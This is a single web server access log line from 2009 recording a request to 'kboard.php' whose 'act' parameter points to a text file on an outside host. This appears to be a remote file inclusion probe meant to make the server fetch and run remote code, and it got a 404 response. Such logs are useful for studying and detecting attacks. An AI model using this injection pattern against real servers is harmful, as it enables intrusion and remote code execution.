209.172.33.230 - - [26/Jun/2009:06:46:39 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
